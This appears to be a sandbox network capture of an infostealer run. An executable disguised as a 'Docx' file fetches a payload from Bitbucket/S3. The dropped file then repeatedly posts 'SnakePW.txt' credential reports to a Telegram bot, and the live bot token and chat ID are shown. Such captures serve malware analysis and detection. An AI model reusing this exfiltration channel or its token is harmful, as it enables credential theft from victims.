User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 18, 2024 16:17:10.098916054 CET | 321 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 15:17:09 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 6f70ffcdc96bae2402542dcdc40611ea
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49715 | 185.166.143.49 | 443 | 1560 | C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:16:41 UTC | 187 | OUT | GET /ntim1478/gpmaw/downloads/202_Cneehezxuzj HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                      Host: bitbucket.org
2024-12-18 15:16:41 UTC | 5919 | IN | HTTP/1.1 302 Found
                                                                                                                      Date: Wed, 18 Dec 2024 15:16:41 GMT
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Content-Length: 0
                                                                                                                      Server: AtlassianEdge
                                                                                                                      Location: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNEALCMKKZ&Signature=5HNNyrRhI17TtxEvBhRXBlIjzcE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIHzBvFwyiabwJo1RlEoXCuvYHlAj6GVUZcZJKMBSK6ENAiEA3lwDPyl2LnkI6qpuGfjEQS9N8qqF9JEL2NUziGWNIn8qpwIIYBAAGgw5ODQ1MjUxMDExNDYiDDj%2BrSjdv5z1DIwKsiqEApJ6u4jhBQd6j%2F999%2FKkXtAvgpY37KiSNSwzYxBC8wGz1X3uO0OlC3WWJ5HAblmMn89zpI6f9%2BRlrc7sEdixhZASuJjFVAm0rJDVe%2BcMUyRk%2FduiqyuXya%2BU7xCgRBhsKNelgYsfCR%2FexdjG4q1vGkc8XCMvlYKeYOdtMKIRlFzLXsXEh8MrIP8O90zcOf2tzV0xktzXWNPU1azrGxRsSRJXq35xOUz0%2FJR%2FQfN0mW9QaJrOxnrli3WFJajfSk9OFZwIhVZ8aqEv%2FHqW4txt8CUPEz8sZ1QR29gsSzQcgvThmwSrYgPJSR2%2BdgVltAF%2F17Esh33PZq4j1bIpUHdeXcONqWL9MJ3Ji7sGOp0BjViqRpDV2XSIOnqCOIjo564QwrPkJGWVJI%2B7Qg%2BAmAfIYrTa4QwMXzoydc9fWDEBwHeXx4VGraN4rvN9o4uGCAK98mQ8Io30C [TRUNCATED]
                                                                                                                      Expires: Wed, 18 Dec 2024 15:16:41 GMT
                                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                      X-Used-Mesh: False
                                                                                                                      Vary: Accept-Language, Origin
                                                                                                                      Content-Language: en
                                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                      X-Dc-Location: Micros-3
                                                                                                                      X-Served-By: 35b9ad4f345a
                                                                                                                      X-Version: 020364176b66
                                                                                                                      X-Static-Version: 020364176b66
                                                                                                                      X-Request-Count: 889
                                                                                                                      X-Render-Time: 0.04507756233215332
                                                                                                                      X-B3-Traceid: 1aff189c891048b1b5c148517a921f48
                                                                                                                      X-B3-Spanid: 68c7d9651d58cf77
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-serv [TRUNCATED]
                                                                                                                      X-Usage-Quota-Remaining: 999179.981
                                                                                                                      X-Usage-Request-Cost: 833.10
                                                                                                                      X-Usage-User-Time: 0.021404
                                                                                                                      X-Usage-System-Time: 0.003589
                                                                                                                      X-Usage-Input-Ops: 0
                                                                                                                      X-Usage-Output-Ops: 0
                                                                                                                      Age: 0
                                                                                                                      X-Cache: MISS
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                      Atl-Traceid: 1aff189c891048b1b5c148517a921f48
                                                                                                                      Atl-Request-Id: 1aff189c-8910-48b1-b5c1-48517a921f48
                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                      Server-Timing: atl-edge;dur=159,atl-edge-internal;dur=6,atl-edge-upstream;dur=154,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49716 | 52.217.32.148 | 443 | 1560 | C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:16:43 UTC | 1287 | OUT | GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNEALCMKKZ&Signature=5HNNyrRhI17TtxEvBhRXBlIjzcE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIHzBvFwyiabwJo1RlEoXCuvYHlAj6GVUZcZJKMBSK6ENAiEA3lwDPyl2LnkI6qpuGfjEQS9N8qqF9JEL2NUziGWNIn8qpwIIYBAAGgw5ODQ1MjUxMDExNDYiDDj%2BrSjdv5z1DIwKsiqEApJ6u4jhBQd6j%2F999%2FKkXtAvgpY37KiSNSwzYxBC8wGz1X3uO0OlC3WWJ5HAblmMn89zpI6f9%2BRlrc7sEdixhZASuJjFVAm0rJDVe%2BcMUyRk%2FduiqyuXya%2BU7xCgRBhsKNelgYsfCR%2FexdjG4q1vGkc8XCMvlYKeYOdtMKIRlFzLXsXEh8MrIP8O90zcOf2tzV0xktzXWNPU1azrGxRsSRJXq35xOUz0%2FJR%2FQfN0mW9QaJrOxnrli3WFJajfSk9OFZwIhVZ8aqEv%2FHqW4txt8CUPEz8sZ1QR29gsSzQcgvThmwSrYgPJSR2%2BdgVltAF%2F17Esh33PZq4j1bIpUHdeXcONqWL9MJ3Ji7sGOp0BjViqRpDV2XSIOnqCOIjo564QwrPkJGWVJI%2B7Qg%2BAmAfIYrTa4QwMXzoydc9fWDEBwHeXx4VGraN4rvN9o4uGCAK98mQ8Io30CJ2mll5bGrmu1Y%2B9SoBV38pLHiwvgAzvv3NdmAsCcGR [TRUNCATED]
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                      Host: bbuseruploads.s3.amazonaws.com
2024-12-18 15:16:44 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                                                                      x-amz-id-2: Mqm+4psmcKfeWkmFYRRyNVAvp3Yw4HBUTxYxAACYmF6bjbqnHJee4H7DqjO/+MpelZ/642gFueg=
                                                                                                                      x-amz-request-id: 7A5R0WHAX4BV1S95
                                                                                                                      Date: Wed, 18 Dec 2024 15:16:45 GMT
                                                                                                                      Last-Modified: Tue, 10 Dec 2024 22:09:20 GMT
                                                                                                                      ETag: "26779352338d9dc792b7823fbf8d3268"
                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                      x-amz-version-id: IA20jz0GkMTujfnoGO26P_HUbrxCsGFq
                                                                                                                      Content-Disposition: attachment; filename="202_Cneehezxuzj"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Length: 777592
                                                                                                                      Server: AmazonS3
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49758 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:02 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1f4d1c06ddc3
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      Connection: Keep-Alive
2024-12-18 15:17:02 UTC | 535 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 34 64 31 63 30 36 64 64 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1f4d1c06ddc3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:17:03 UTC | 370 | IN | HTTP/1.1 429 Too Many Requests
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:03 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 111
                                                                                                                      Connection: close
                                                                                                                      Retry-After: 10
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:03 UTC | 111 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49782 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:11 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1f4d2162bfeb
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      Connection: Keep-Alive
2024-12-18 15:17:11 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f4d2162bfebContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:17:16 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:17:16 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:16 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418638,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535036,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49790 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:14 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f4d27f0447e
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:17:14 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f4d27f0447eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:17:16 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:17:16 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:16 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418640,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535036,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49799 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:17 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f4d24e5b12f
Host: api.telegram.org
Content-Length: 535
Connection: Keep-Alive
2024-12-18 15:17:17 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f4d24e5b12fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:17:21 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:17:20 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:21 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418684,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535040,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49800 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:18 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f7b1dfba8e0
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:17:18 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f7b1dfba8e0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:17:21 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:17:20 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:21 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418688,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535040,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49812 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:22 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1facead84021
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:17:22 UTC | 535 | OUT | Data Ascii: --------------------------8dd1facead84021Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:17:28 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:17:28 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:28 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418753,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535048,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49821 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:27 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f4d2fc2fa98
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:17:27 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f4d2fc2fa98Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:17:28 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:17:28 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:28 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418755,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535048,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
9           192.168.2.5  49829        149.154.167.220  443               6656  C:\Users\Public\Libraries\xzeheenC.pif
Timestamp                Bytes transferred  Direction  Data
2024-12-18 15:17:30 UTC  328                OUT        POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                       Content-Type: multipart/form-data; boundary=------------------------8dd2000757d4a82
                                                       Host: api.telegram.org
                                                       Content-Length: 535
2024-12-18 15:17:30 UTC  535                OUT        Data Ascii: --------------------------8dd2000757d4a82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:17:34 UTC  388                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0
                                                       Date: Wed, 18 Dec 2024 15:17:34 GMT
                                                       Content-Type: application/json
                                                       Content-Length: 515
                                                       Connection: close
                                                       Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                       Access-Control-Allow-Origin: *
                                                       Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                       Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:34 UTC  515                IN         Data Ascii: {"ok":true,"result":{"message_id":418808,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535054,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
10          192.168.2.5  49830        149.154.167.220  443               432   C:\Users\Public\Libraries\xzeheenC.pif
Timestamp                Bytes transferred  Direction  Data
2024-12-18 15:17:30 UTC  328                OUT        POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                       Content-Type: multipart/form-data; boundary=------------------------8dd1f6bdc044996
                                                       Host: api.telegram.org
                                                       Content-Length: 535
2024-12-18 15:17:30 UTC  535                OUT        Data Ascii: --------------------------8dd1f6bdc044996Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:17:34 UTC  388                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0
                                                       Date: Wed, 18 Dec 2024 15:17:34 GMT
                                                       Content-Type: application/json
                                                       Content-Length: 515
                                                       Connection: close
                                                       Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                       Access-Control-Allow-Origin: *
                                                       Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                       Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:34 UTC  515                IN         Data Ascii: {"ok":true,"result":{"message_id":418809,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535054,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
11          192.168.2.5  49835        149.154.167.220  443               2140  C:\Users\Public\Libraries\xzeheenC.pif
Timestamp                Bytes transferred  Direction  Data
2024-12-18 15:17:31 UTC  328                OUT        POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                       Content-Type: multipart/form-data; boundary=------------------------8dd1f4d324b9521
                                                       Host: api.telegram.org
                                                       Content-Length: 535
2024-12-18 15:17:31 UTC  535                OUT        Data Ascii: --------------------------8dd1f4d324b9521Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:17:34 UTC  388                IN         HTTP/1.1 200 OK
                                                       Server: nginx/1.18.0
                                                       Date: Wed, 18 Dec 2024 15:17:34 GMT
                                                       Content-Type: application/json
                                                       Content-Length: 515
                                                       Connection: close
                                                       Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                       Access-Control-Allow-Origin: *
                                                       Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                       Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:34 UTC  515                IN         Data Ascii: {"ok":true,"result":{"message_id":418811,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535054,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
12          192.168.2.5  49846        149.154.167.220  443               6656  C:\Users\Public\Libraries\xzeheenC.pif
Timestamp                Bytes transferred  Direction  Data
2024-12-18 15:17:35 UTC  328                OUT        POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                       Content-Type: multipart/form-data; boundary=------------------------8dd203ec07e1085
                                                       Host: api.telegram.org
                                                       Content-Length: 535
2024-12-18 15:17:35 UTC  535                OUT        Data Ascii: --------------------------8dd203ec07e1085Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:17:36 UTC  370                IN         HTTP/1.1 429 Too Many Requests
                                                       Server: nginx/1.18.0
                                                       Date: Wed, 18 Dec 2024 15:17:36 GMT
                                                       Content-Type: application/json
                                                       Content-Length: 111
                                                       Connection: close
                                                       Retry-After: 10
                                                       Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                       Access-Control-Allow-Origin: *
